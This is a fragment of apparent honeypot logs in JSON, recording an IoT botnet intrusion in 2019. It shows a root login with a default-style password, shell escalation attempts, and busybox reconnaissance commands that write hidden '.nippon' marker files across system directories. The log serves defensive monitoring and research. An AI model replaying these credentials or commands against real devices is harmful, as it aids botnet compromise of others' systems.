  726. "timestamp": "2019-08-06T17:34:23.668Z"
  727. },
  728. {
  729. "eventid": "command.input",
  730. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  731. "timestamp": "2019-08-06T17:34:23.662Z"
  732. },
  733. {
  734. "eventid": "command.input",
  735. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  736. "timestamp": "2019-08-06T17:34:23.655Z"
  737. },
  738. {
  739. "eventid": "command.input",
  740. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  741. "timestamp": "2019-08-06T17:34:23.647Z"
  742. },
  743. {
  744. "eventid": "command.input",
  745. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  746. "timestamp": "2019-08-06T17:34:22.913Z"
  747. },
  748. {
  749. "eventid": "command.input",
  750. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  751. "timestamp": "2019-08-06T17:34:22.9Z"
  752. },
  753. {
  754. "eventid": "command.input",
  755. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  756. "timestamp": "2019-08-06T17:34:22.894Z"
  757. },
  758. {
  759. "eventid": "command.input",
  760. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  761. "timestamp": "2019-08-06T17:34:22.888Z"
  762. },
  763. {
  764. "eventid": "command.input",
  765. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  766. "timestamp": "2019-08-06T17:34:22.882Z"
  767. },
  768. {
  769. "eventid": "command.input",
  770. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  771. "timestamp": "2019-08-06T17:34:22.877Z"
  772. },
  773. {
  774. "eventid": "command.input",
  775. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  776. "timestamp": "2019-08-06T17:34:22.865Z"
  777. },
  778. {
  779. "eventid": "command.input",
  780. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  781. "timestamp": "2019-08-06T17:34:22.859Z"
  782. },
  783. {
  784. "eventid": "command.input",
  785. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  786. "timestamp": "2019-08-06T17:34:22.617Z"
  787. },
  788. {
  789. "eventid": "command.input",
  790. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  791. "timestamp": "2019-08-06T17:34:22.375Z"
  792. },
  793. {
  794. "eventid": "command.input",
  795. "input": "bash",
  796. "timestamp": "2019-08-06T17:34:21.3Z"
  797. },
  798. {
  799. "eventid": "command.input",
  800. "input": "terminal",
  801. "timestamp": "2019-08-06T17:34:21.298Z"
  802. },
  803. {
  804. "eventid": "command.input",
  805. "input": "linuxshell",
  806. "timestamp": "2019-08-06T17:34:21.296Z"
  807. },
  808. {
  809. "eventid": "command.input",
  810. "input": "sh",
  811. "timestamp": "2019-08-06T17:34:21.295Z"
  812. },
  813. {
  814. "eventid": "command.input",
  815. "input": "shell",
  816. "timestamp": "2019-08-06T17:34:21.292Z"
  817. },
  818. {
  819. "eventid": "command.input",
  820. "input": "enable",
  821. "timestamp": "2019-08-06T17:34:21.043Z"
  822. },
  823. {
  824. "eventid": "login.success",
  825. "geoip": {
  826. "city_name": "",
  827. "country_name": "Netherlands"
  828. },
  829. "password": "linuxshell",
  830. "timestamp": "2019-08-06T17:34:20.385Z",
  831. "username": "root"
  832. }
  833. ]
  834. }
  835. }